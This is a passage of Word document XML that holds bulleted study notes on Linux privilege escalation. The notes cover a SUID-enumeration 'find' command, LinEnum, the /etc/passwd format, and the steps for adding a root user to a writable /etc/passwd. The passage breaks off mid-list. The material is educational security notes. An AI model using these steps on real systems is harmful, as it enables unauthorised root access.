        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex of GUI – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rwx-rws-rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48B84E7D" w14:textId="76323C25" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Finding SUID Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A4092" w14:textId="0809936E" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72699190" w14:textId="09264F8A" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>manual – find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F6102" w14:textId="043172E4" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-perm – specific permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78114813" w14:textId="62750E2D" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-u=s – any permission bits mode </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> set for the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FADC93C" w14:textId="2BE5ACB4" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-type f – only search files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F3468" w14:textId="282125F7" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>2&gt;/dev/null – suppresses errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA36E5" w14:textId="170AD5EF" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>search for shell files with SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BDF856" w14:textId="68A2B7D7" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting Writeable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457395F0" w14:textId="5FBFD641" w:rsidR="00473F85" w:rsidRPr="0084205E" w:rsidRDefault="00473F85" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>find users with permissions</w:t>
      </w:r>
      <w:r w:rsidR="00627141" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> that match permissions of target files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B6DE1" w14:textId="65F2CCEA" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. if user7 is part of root group gid 0, and /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/passwd is user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>writeable,  it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> stands to reason that user7 can edit /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC0EB7" w14:textId="7B93442E" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB935E" w14:textId="766624A7" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>stores essential user account information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799090A" w14:textId="0750FFE8" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>plaintext file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497615A9" w14:textId="5A65D07F" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>should have general read permission as utilities use it to map user IDs to usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC6E16" w14:textId="2874FE11" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>write access limited to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4395D6" w14:textId="759E23BB" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>erroneous additions of users or an expanded list of users is a vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDBBB6" w14:textId="315326E3" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E07972C" w14:textId="233F02D2" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>contains one entry per line for each user of system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BE551" w14:textId="4D0F5083" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>fields separated by a colon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90A01C" w14:textId="6825DB9B" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>syntax – user:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>x:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66B5A8" w14:textId="159B27DD" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54FF74" w14:textId="12EEA113" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A6130B" w14:textId="016669A4" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>x indicates encrypted in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34A6C" w14:textId="50EF5A38" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>UID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965058B" w14:textId="614B4A73" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>0 – root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C206CE" w14:textId="5742C3C2" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>1-99 reserved for predefined accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CCD35" w14:textId="55647AE1" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>100-999 – reserved by system for admin and system accounts/groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C01135D" w14:textId="0ACADDA9" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A660A8" w14:textId="68FBBFB6" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>stored in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8D8E0" w14:textId="1CF69145" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User ID info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2FC9FA" w14:textId="10873D68" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allows addition of extra information about user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B6D8A" w14:textId="4A87A303" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>used by finger command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D514920" w14:textId="50858667" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81EEDE" w14:textId="185D0203" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>absolute path to the directory the user will be in when they log in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322EBBB" w14:textId="1453FA5B" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if it does not exist, user directory becomes /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCE220" w14:textId="74B832A6" w:rsidR="00627141" w:rsidRPr="0084205E" w:rsidRDefault="00627141" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command/shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BEFFB" w14:textId="1E79553B" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>absolute path of a command or shell(/bin/bash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC76EFC" w14:textId="127FDF9B" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> a shell but does not HAVE to be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1EA6A" w14:textId="1C1259DB" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How to exploit a writeable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070DDE89" w14:textId="6BABF7FE" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>write new line entry according to above formula and create a new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55C735" w14:textId="25DAE94A" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>add password hash of choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A347893" w14:textId="519A84A2" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>compliant hash command</w:t>
      </w:r>
    </w:p>
